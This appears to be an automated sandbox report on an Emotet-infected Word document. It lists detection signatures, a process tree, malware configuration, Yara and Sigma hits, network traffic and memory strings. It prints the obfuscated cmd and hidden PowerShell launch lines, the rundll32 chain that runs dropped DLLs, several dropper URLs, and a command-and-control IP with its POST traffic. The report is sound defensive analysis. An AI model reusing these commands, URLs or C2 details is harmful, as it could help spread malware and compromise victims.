
Analysis Report Order.doc

Overview

General Information

Sample Name: Order.doc
Analysis ID: 344065
MD5: 1a0ae833990a558910254e9bebfaeeaf
SHA1: c6f348043fb590f9638ed792a331695475b79af1
SHA256: 5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
Tags: Heodo

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1028 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2424 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2444 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2488 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2504 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 1296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2868 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(Only the first 5 of 13 entries are shown.)

Unpacked PEs

Source | Rule | Description | Author | Strings
10.2.rundll32.exe.320000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.210000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.400000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
10.2.rundll32.exe.280000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
12.2.rundll32.exe.260000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(Only the first 5 of 19 entries are shown.)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1296, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1, ProcessId: 2756
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: powershell -w hidden -enc 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

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ | Avira URL Cloud: Label: malware
Source: http://nightlifemumbai.club/x/0wBD3/ | Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev | Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll | ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: Order.doc | Virustotal: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll | Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: nightlifemumbai.club
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49167 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp | String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp | String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp | String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: global traffic | HTTP traffic detected:
    GET /x/0wBD3/ HTTP/1.1
    Host: nightlifemumbai.club
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 190.55.186.229
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: TelecentroSAAR
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected:
    POST /efl8dd1i/ HTTP/1.1
    DNT: 0
    Referer: 190.55.186.229/efl8dd1i/
    Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 190.55.186.229
    Content-Length: 6388
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown | TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp
Source: global traffic | HTTP traffic detected:
    GET /x/0wBD3/ HTTP/1.1
    Host: nightlifemumbai.club
    Connection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown | HTTP traffic detected:
    POST /efl8dd1i/ HTTP/1.1
    DNT: 0
    Referer: 190.55.186.229/efl8dd1i/
    Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 190.55.186.229
    Content-Length: 6388
    Connection: Keep-Alive
    Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 22:13:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 
78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2090020372.000000000048A000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
